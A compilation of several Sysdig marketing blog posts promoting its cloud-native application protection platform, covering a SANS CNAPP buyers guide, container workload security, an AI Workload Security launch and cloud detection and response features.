The SANS CNAPP Buyers Guide provides an in-depth look at what criteria to consider when purchasing a CNAPP solution, as well as a checklist of required and desired capabilities for the security platform. By utilizing this guide as a resource to navigate the buying process, you can ensure your security platform provides a unified cloud and container security experience with no blind spots. Download the full guide here.

Why Purchase a CNAPP?

The explosive growth of cloud and containers has created an expanded and dynamic attack surface that security teams need to defend. As more developers deploy containerized microservices and utilize cloud services and infrastructure, monitoring and protecting them becomes more complex. Security teams now have dynamic workloads with 10–100x more containerized compute instances, large volumes of cloud assets with dynamic activity to track, and messy and overly permissive identity and access management (IAM) permissions to manage. This rapid expansion of the attack surface in cloud-native applications has led to many vulnerabilities, misconfigurations, and security weaknesses to manage, and security teams need a tool that provides full visibility across cloud and containers.

As weaknesses in security posture have increased, security and operations teams have become overwhelmed by the number of alerts and vulnerabilities they face, leaving organizations with long exposure windows to critical vulnerabilities. As the adoption of cloud services and containers/Kubernetes increases the sources of data to analyze, you need a way to process all this data into insights that can be applied to remediating security issues. Without significant additional context on your cloud workloads and infrastructure, it is difficult for teams to prioritize which of these alerts actually present significant risks and which are just noise. An effective CNAPP will use knowledge of which containers and packages are actually running to provide actionable insights that security and DevOps teams can use to prioritize the most critical risks.

The move to the cloud has also led to an evolution in the threat landscape to take advantage of the security gaps in cloud-native applications. Bad actors have adapted their tactics and techniques to quickly compromise cloud environments with valid credentials, find and exploit vulnerabilities, and move laterally across workloads and clouds to extract maximum return from any breach. The changes to the threat landscape call for a complete solution that can detect these modern threats throughout your cloud-native infrastructure.

The Value of Sysdig’s CNAPP

LEARN MORE

Traditional Tools Fall Short

Many traditional security tools are not suited to cloud workloads, environments, and the threats that have evolved to take advantage of their weaknesses. Tools like endpoint detection and response (EDR) solutions lack critical visibility into cloud services, workloads, and Kubernetes, and create blind spots that can easily be exploited. Traditional tools also often send many alerts and signals, but lack the context needed to rapidly and effectively respond to threats in cloud-based applications and workloads. The dynamic nature of software development and deployment, as well as the ephemeral nature of containerized environments, only add to the complexity, and security and DevOps teams need a security tool specifically designed to handle cloud-native environments.

Further, point solutions don’t work. Often organizations must choose from among multiple solutions, or even choose vendors that stitch together a workflow from multiple acquisitions. These tools don’t communicate with each other or share context, resulting in a reactive approach of dealing with disparate vulnerability findings, posture violations, and threats as they become a problem. This approach leaves teams without the insights they need to prioritize issues based on their impact.

What to Look for in a CNAPP Solution

Security and DevOps teams need comprehensive visibility into workloads, cloud activity, and user behavior in real time. The number of signals that teams have to make sense of is exploding, and a comprehensive CNAPP solution needs to help users focus on the most critical risks in their cloud-native infrastructure.

This is where having deep knowledge of what’s running right now can help you shrink the list of things that need attention first. Simply put, knowledge of what’s running (or simply what’s in use) is the necessary context needed by security and DevOps teams to take action on the most critical risks first. Ultimately, this context can be fed back early in the development lifecycle to make “shift-left” better with actionable prioritization. With all the sources of data that a CNAPP has to ingest and analyze, an effective CNAPP solution needs runtime insights to help teams focus on the risks that really matter. For example, by filtering on vulnerabilities in packages active at runtime, you can reduce vulnerability noise by up to 95%.

With the SANS CNAPP Buyers Guide, you can make sure your organization is focused on the most critical risks in your cloud infrastructure. The guide includes a detailed checklist of important capabilities and features to look for in a CNAPP solution. While there are too many to list here in full, the capabilities of an effective CNAPP solution fall into these areas.

User Experience: Many solutions today are not intuitive and may be difficult to work with. Effective CNAPP solutions should offer unified security and risk dashboards, as well as aggregated security findings and remediation suggestions through simple interfaces. They should also be simple to deploy.

Cloud Workload Protection (CWP): A CNAPP solution should protect workloads across the software lifecycle, with capabilities in vulnerability management, configuration management for containers/Kubernetes, and runtime security/incident response. The ability to prioritize the most critical vulnerabilities or configurations based on in-use risk exposure is key. The tool should integrate with CI/CD tools, provide rich context to investigate alerts, and give suggestions to fix at the source.

Cloud Security Posture Management (CSPM): Continuous visibility, detection, and remediation of cloud security misconfigurations is key for a CNAPP solution. The solution should offer capabilities in cloud vulnerability management, configuration management, and permissions/entitlement management (e.g., CIEM).

Cloud Detection and Response (CDR): Detection and response capabilities related to cloud-centric threats are critical. Effective CNAPP solutions should expand beyond just workload runtime security and address the cloud control plane to detect suspicious activities across users and services.

Enterprise-grade Platform: Effective CNAPP solutions often have enhancements and additional features that integrate and align with API use, scripting and automation functionality, auditing and logging, and support for large-scale deployments.

Want to see the full list of capabilities? Download the full SANS Cloud-Native Application Protection Platform (CNAPP) Buyers Guide now for all the details.

The post SANS Cloud-Native Application Protection Platforms (CNAPP) Buyers Guide appeared first on Sysdig.

A New Normal Brings New Challenges

In modern application development, containers are quickly becoming a popular tool for developers, providing numerous advantages including improved agility and scalability. They provide developers with flexibility to update a specific container or microservice instead of the entire application, greatly speeding the pace of innovation. The convergence of cloud migration and widespread adoption of DevOps practices has pushed containerization as a prevailing trend, empowering organizations to streamline their operations and increase the pace of new releases.

While adoption increases every year, containers are still a relatively young technology, with many companies still in the early stages of their containerization journey. The ever-evolving technology ecosystem surrounding containers, including Kubernetes, introduces constant shifts and updates, and development teams and infrastructure expanded faster than security teams. As a result, there is a general scarcity of cloud-native security talent and expertise needed to effectively secure these environments. We have also seen developers increasingly shoulder security responsibilities as organizations embrace DevSecOps strategies. Containers offer many advantages for innovation and agility, but they also expand the potential attack surface, posing a challenge for security teams trying to balance security and speed.

Two Sides Of Container Security

As container technology continues to mature, two key security trends have emerged over the last few years. The first revolves around key risks getting obscured by the endless noise and alerts created by many security tools. Under the DevSecOps model, developers are often responsible for fixing vulnerabilities in the code packages they deploy but find themselves overwhelmed by the sheer volume of alerts. Our research found that of cloud workloads with critical or high severity vulnerabilities, only 1.2% are exploitable, have a fix, and are actually in use by the application.The number of new cloud-related CVEs increased by nearly 200% in 2023, and the sharing of open source container images has left security teams facing a large number of critical and high-severity container vulnerabilities. The challenge many organizations face lies in discerning which of these risks actually have a high chance of exploitation and which can be deprioritized. The last thing any developer or security team wants is to waste valuable time sifting through a long list of security findings, only to discover that many are inconsequential.

The second major trend is the impressive speed at which cloud attacks now move. As more companies have shifted to cloud-native applications, attackers have adapted to leverage the architecture upon which these apps are built. After finding an exploitable asset, malicious actors need only minutes to execute an attack and start causing damage. The initial stages of cloud attacks can be heavily automated, and attackers are coming up with all sorts of sophisticated techniques to disguise their presence. In just the past year, we’ve observed numerous attacks where a malicious actor gained initial access through a vulnerability in a container image or open source software dependency, including the well-known SSHD backdoor in XZ Utils. Once infiltrating the environment, attackers can easily move laterally – whether from workload to cloud or vice versa – hunting for credentials or sensitive data to exploit for profit.

A Modern Approach To Cloud Container Security And Workload Protection

As the container security landscape evolves, organizations are looking to strike a balance between prevention and defense. Initially, many utilized different tools to secure their containers than they used for other parts of their cloud infrastructure. However, container threats now often cross cloud domains, making this segmented approach slow and outdated. The lack of communication between these tools results in viewing container security in isolation. While an isolated tool might detect a malicious actor breaching a vulnerable container, the post-escape attack path remains obscured. A more robust approach is to use a unified platform that connects the dots across your broad cloud infrastructure to thwart and respond to threats with agility. Already, numerous enterprises have started this journey towards consolidating cloud security. In the 2023 Gartner® Market Guide for Cloud-Native Application Protection Platforms (CNAPP), Gartner predicts this trend will continue, forecasting that by 2025, 60% of enterprises will have consolidated cloud workload protection platform (CWPP) and cloud security posture management (CSPM) capabilities to a single vendor or CNAPP. Container security falls squarely into this category of CWPP and security leaders and practitioners will need to keep up with this change as the boundaries between domains across the cloud begin to blur.

To adapt to this new normal, organizations need to rethink their approach to container security. Despite the evolving threat landscape, the fundamental challenge remains the same: security and developer teams must catch vulnerabilities in container images and detect threats at runtime. But now, they must approach this challenge with a different lens. In the modern environment, container security and workload protection need cloud context to be truly effective. Correlating container findings with context across the cloud is essential to getting the full picture of how an attacker can exploit your environment. Armed with this context, teams can focus on active real-time risk in their organization and view containers as part of a larger story.

Container security and workload protection typically encompasses use cases like threat detection and response, vulnerability management, and Kubernetes security posture management (KSPM). These elements remain critical, but this new approach integrates them with findings like real-time configuration changes, risky identity behavior, and cloud log detections. These other findings are usually associated with CSPM but are becoming relevant for container security. Combining these factors with real-time contextual insights on vulnerabilities and container threats paints a comprehensive picture of potential attack paths throughout a user’s environment. Solely focusing on containers may reveal an initial breach but fails to unveil the extent of damage or anticipate the attacker’s next move. As long as your organization has workloads running in the cloud, this additional cloud context provides great value.

Bringing The Best Of Agent And Agentless To Workload Protection

The best way to achieve this balance of security and speed combines agent-based and agentless strategies. There is an ongoing debate over whether agent-based or agentless approaches are more effective, with agentless instrumentation becoming a popular approach due to its ease of deployment and rapid time to value. For this reason, many security teams prefer to implement an agentless approach wherever possible. While there are benefits to both approaches, the most effective solutions will integrate both for comprehensive visibility. For containers, agents provide deeper runtime visibility and real-time detection for faster time to discovery. Unfortunately, it is not always possible to deploy them universally due to resource constraints.

In these cases, leveraging agentless instrumentation to supplement agents ensures full breadth of coverage across your infrastructure. For container security, deploying agents strategically allows you to prioritize vulnerabilities based on in-use packages and detect threats in real time – capabilities that are not possible with a solely agentless approach. Supplementing this with agentless deployments enables quick basic vulnerability scanning across all containers. As previously highlighted, integrating cloud context into workload protection – often achieved through agentless means – is a great way to anticipate and combat live attacks. This approach not only tackles the traditional challenges associated with container security and workload protection but also provides a full picture and rich context to address the most significant risks. Both approaches bring clear benefits to container security, but this new approach of implementing agentless where possible to supplement the deeper insights from agents brings the best of both worlds.

Security Must Continue To Adapt

The rise of containerization and cloud-native applications, along with the advances made by attackers, has brought us to a challenging point for workload protection. In this constant chess game, security teams must remain proactive and adaptable, continuously evolving their defenses or risk being breached by emerging threats.

Ultimately, organizations that adapt the quickest will be best equipped to detect attacks that strike without warning in a matter of minutes. As boundaries between cloud domains continue to become less defined and the market moves towards consolidation, the ability to connect events across your entire cloud infrastructure will be key to protecting your assets and mitigating risk.

The post Next-Gen Container Security: Why Cloud Context Matters appeared first on Sysdig.

Today, we are thrilled to announce the launch of AI Workload Security to identify and manage active risk associated with AI environments. This new addition to our cloud-native application protection platform (CNAPP) will help security teams see and understand their AI environments, identify suspicious activity on workloads that contain AI packages, and prioritize and fix issues fast.

Skip ahead to the launch details!

AI has changed the game

The explosive growth of AI in the last year has reshaped the way many organizations build applications. AI has quickly become a mainstream topic across all industries and a focus for executives and boards. Advances in the technology have led to significant investment in AI, with more than two-thirds of organizations expected to increase their AI investment over the next three years across all industries. GenAI specifically has been a major catalyst of this trend, driving much of this interest. The Cloud Security Alliance’s recent State of AI and Security Survey Report found that 55% of organizations are planning to implement GenAI solutions this year. Sysdig’s research also found that since December 2023, the deployment of OpenAI packages has nearly tripled.

With more companies deploying GenAI workloads, Kubernetes has become the deployment platform of choice for AI. Large language models (LLMs) are a core component of many GenAI applications that can analyze and generate content by learning from large amounts of text data. Kubernetes has numerous characteristics that make it an ideal platform for LLMs, providing advantages in scalability, flexibility, portability, and more. LLMs require significant resources to run, and Kubernetes can automatically scale resources up and down, while also making it simple to export LLMs as container workloads across various environments. The flexibility when deploying GenAI workloads is unmatched, and top companies like OpenAI, Cohere, and others have adopted Kubernetes for their LLMs. 

From opportunity to risk: security implications of AI

AI continues to advance rapidly, but the widespread adoption of AI deployment creates a whole new set of security risks. The Cloud Security Alliance survey found that 31% of security professionals believe AI will be of equal benefit to security teams and malicious third parties, with another 25% believing it will be more beneficial to malicious parties. Sysdig’s research also found that 34% of all currently deployed GenAI workloads are publicly exposed, meaning they are accessible from the internet or another untrusted network without appropriate security measures in place. This increases the risk of security breaches and puts the sensitive data leveraged by GenAI models in danger.

Another development that highlights the importance of AI security in the cloud are the forthcoming guidelines and increasing pressures to audit and regulate AI, as proposed by the Biden administration’s October 2023 Executive Order and following recommendations from the National Telecommunications and Information Administration (NTIA) in March 2024. The European Parliament also adopted the AI Act in March 2024, introducing stringent requirements on risk management, transparency, and other issues. Ahead of this imminent AI legislation, organizations should assess their own ability to secure and monitor AI in their environments.

Many organizations lack experience securing AI workloads and identifying risks associated with AI environments. Just like the rest of an organization’s cloud environment, it is critical to prioritize active risks tied to AI workloads, such as vulnerabilities in in-use AI packages or malicious actors trying to modify AI requests and responses. Without full understanding and visibility of AI risk, it’s possible for AI to do more harm than good.

Mitigate active AI risk with AI Workload Security

We’re excited to unveil AI Workload Security in Sysdig’s CNAPP to help our customers adopt AI securely. AI Workload Security allows security teams to identify and prioritize workloads in their environment with leading AI engines and software packages, such as OpenAI and Tensorflow, and detect suspicious activity within these workloads. With these new capabilities, your organization can get real-time visibility of the top active AI risks, enabling your teams to address them immediately. Sysdig helps organizations manage and control their AI usage, whether it’s official or deployed without proper approval, so they can focus on accelerating innovation.

Sysdig’s AI Workload Security ties into our Cloud Attack Graph, the neural center of the Sysdig platform, integrating with our Risk Prioritization, Attack Path Analysis, and Inventory features to provide a single view of correlated risks and events.

AI Workload Security in action

The introduction of real-time AI Workload Security helps companies prioritize the most critical risks associated with AI environments. Sysdig’s Risks page provides a stack-ranked view of risks, evaluating which combinations of findings and context need to be addressed immediately across your cloud environment. Publicly exposed AI packages are highlighted along with other risk factors. In the example below, we see a critical risk with the following findings:

1. Publicly exposed workload
2. Contains an AI package
3. Has critical vulnerability with an exploit running on an in-use package
4. Contains a high confidence event

Based on the combination of findings, users can determine the severity of the risk that exposed AI workloads create. They can also gather more context around the risk, including which packages on the workload are running AI and whether vulnerabilities on these packages can be fixed with a patch.

Digging deeper into these risks, users can also get a more visual representation of the exploitable links across resources with Attack Path Analysis. Sysdig uncovers potential attack paths involving workloads with AI packages, showing how they fit with other risk factors like vulnerabilities, misconfigurations, and runtime detections on these workloads. Users can see which AI packages running on the workload are in use and how vulnerable packages can be fixed. With the power of AI Workload Security, users can quickly identify critical attack paths involving their AI models and data, and correlate with real-time events.

Sysdig also gives users the ability to identify all of the resources in your cloud environment that have AI packages running. AI Workload Security empowers Sysdig’s Inventory, enabling users to view a full list of resources containing AI packages with a single click, as well as identify risks on these resources.

Want to learn more?

Armed with these new capabilities, you’ll be well equipped to defend against active AI risk, helping your organization realize the full potential of AI’s benefits. These advancements provide an additional layer of security to our top-rated CNAPP solution, stretching our coverage further across the cloud. Click here to learn more about Sysdig’s leading CNAPP.

See Sysdig in action

Sign up for our Kraken Discovery Lab to execute real cloud attacks and then assume the role of the defender to detect, investigate, and respond.

The post Accelerating AI Adoption: AI Workload Security for CNAPP appeared first on Sysdig.

The move to the cloud and containers has sped up innovation but also expanded the attack surface that security teams must defend. As organizations grow their cloud infrastructures, they encounter the challenge of sprawl, with hundreds of unchecked and potentially vulnerable applications, services, and identities. Cybercriminals are adapting to this landscape, utilizing advanced techniques to gain access to these environments and extract maximum value. With the global average cost of a data breach reaching a staggering $4.35 million last year, according to IBM, staying ahead of attackers is critical to prevent becoming another statistic in this alarming trend.

Expanding detection and response across the application life cycle

The dynamic attack surface of the cloud has greatly increased the complexity of securing cloud-native applications. Organizations are deploying hundreds or even thousands of containers in production, and managing large volumes of cloud assets and permissions. As a result, security teams and developers need an integrated tool that instantly and continuously provides visibility and shares context across the entire environment. More and more organizations are looking for a cloud-native application protection platform (CNAPP) that consolidates security across the application life cycle, instead of relying on multiple costly solutions that protect different areas.

This is especially important since attackers only require a single entry point into your environment to inflict substantial harm. Once inside, they can move laterally to access sensitive data or carry out cryptojacking attacks. In this battle, the integration of cloud detection and response (CDR) within a comprehensive CNAPP becomes a vital capability. Security teams must possess the ability to swiftly identify various types of threats spanning their entire infrastructure, and respond promptly within a limited timeframe. The scope of threat detection has now expanded to encompass not only workload runtime security, but also cloud services, identities, and the software supply chain. By consolidating CDR and CNAPP, your organization can attain a full understanding of potential threats and proactively address them before they manifest into significant issues.

Most existing cloud security tools fall short

Most existing cloud security tools are slow to identify suspicious behavior and don’t provide sufficient context for security teams to understand how an attack was carried out. This lack of context hinders effective incident response. Once alerted by these tools, organizations often find themselves in a time-consuming and frustrating process of sifting through numerous snapshots, logs, and disparate data sources, trying to piece together the intricate chain of events. This delay prolongs the exposure to threats by hours or even days, allowing them to cause widespread damage while the organization remains in the dark, unaware of the full extent of the breach. Other conventional security tools, like endpoint detection and response (EDR) tools, are not designed to handle the scale or velocity of the cloud and struggle to address cloud-native constructs or show correlation across user activity and workload anomalies.

In evaluating security tools designed for the cloud, there is a debate over whether agent-based or agentless approaches are more effective. The most effective solutions, however, will incorporate both. In the 2023 Gartner® Market Guide for Cloud-Native Application Protection Platforms, Gartner advises prioritizing CNAPPs that “provide a variety of runtime visibility techniques…to provide the most flexibility at deployment.” By leveraging a combination of real-time, agent-based detections and log-based, agentless detections, you can swiftly identify threats across your entire cloud environment and surface the necessary context to respond. Existing cloud security vendors that are unable to offer strong agent-based AND agentless solutions will never provide the complete approach necessary to effectively combat modern threats.

Real-time and end-to-end threat detection

Sysdig is expanding our CDR capabilities to provide end-to-end threat detection throughout the entire cloud fabric. With Sysdig Secure, we are introducing a new agentless deployment of Falco for processing cloud logs to detect threats across cloud, identity, and the software supply chain.

Sysdig’s agentless deployment model supplements our existing agent-based deployment of Falco. We’ve already solved the hard part of cloud security, cloud-native runtime security, with our agent-based workload protection. Combined with our agentless detection capabilities, Sysdig provides 360-degree visibility and correlation across workloads, identities, cloud services, and third-party applications. No matter what entry point an attack targets, our flexible deployment models empower you to protect your cloud and applications effectively.

Identity threat detection

Malicious actors have continued to develop techniques for obtaining valid credentials to access sensitive data. Sysdig’s Okta detections enable security teams to protect against common identity attacks, such as multifactor authentication fatigue caused by spamming and account takeover, protecting your valuable data from unauthorized access.

Software supply chain detection

With 61% of all container images pulled from public repositories, threat actors are trying to exploit these repositories as an attack vector. Sysdig’s GitHub detections extend threat detection into the software supply chain, alerting security and DevOps teams on common GitHub security risks, such as when a secret is pushed into a repository or a private repository becomes public.

Enhanced drift control

Sysdig’s Drift Control dynamically blocks executables that were added or modified after a container is deployed into production. By blocking container drift, you can prevent many common runtime attacks that run scripts or malware with embedded executables. Drift Control is a simple runtime security policy that can be quickly applied to the entire environment:

Speeding up incident response with live threat investigation

Sysdig CDR also offers advanced incident response capabilities that empower you to investigate and respond at cloud speed. The longer a malicious actor maintains access to your environment, the greater the potential for extensive damage. Furthermore, the cost associated with a data breach escalates as time elapses without proper response. Immediate response is crucial, but without proper context, understanding the threat and reacting swiftly becomes a challenge. With Sysdig CDR, you gain the insights necessary to take rapid and informed action.

Live mapping

Kubernetes Live brings an EDR-like approach of assembling all relevant real-time events into one view when a breach occurs. This provides teams with a dynamic view of their live infrastructure and workloads, as well as the relationships between them. Equipped with understanding of all the vulnerable workloads, critical security events, and triggered runtime policies in your Kubernetes environment, you can speed incident response with enriched context. Learn more about Kubernetes Live in this blog.

Attack lineage with context

Sysdig Process Tree unveils the attack journey from user to process. This includes the process lineage to show how a process was initiated, as well as key context like container and host information, malicious user details, and impact. With a full understanding of the relationships and dependencies between processes, you can identify which processes are malicious and act on them quickly. Learn more about Process Tree in this blog.

Curated threat dashboards

Sysdig’s threat dashboards spotlight events across clouds, containers, Kubernetes, and hosts, acting as a centralized view of critical security issues. Sysdig also provides dynamic mapping against the MITRE ATT&CK framework for cloud-native environments. Security teams can use this information to understand the full landscape of threats in their environment and prioritize response.

Key Benefits of Sysdig CDR

• Stop cloud breaches with real-time, end-to-end threat detection powered by Falco: Consolidate security with an approach combining Drift Control, Machine Learning, and Falco detections, all curated by Sysdig Threat Research.
• Accelerate cloud threat investigation and incident response in real time: Surface the context you need to understand the possible impact and respond quickly.

Sysdig is the first vendor to deliver the consolidation of CDR and CNAPP, leveraging the power of open source Falco in both agent and agentless deployment models. With Sysdig CDR, you can prevent advanced attacks and contain threats in real time across the cloud fabric.

If you want to learn more, sign up for one of our upcoming webinars or get a demo today.

The post Stop Cloud Breaches in Real Time and Accelerate Investigation and Response with Sysdig CDR appeared first on Sysdig.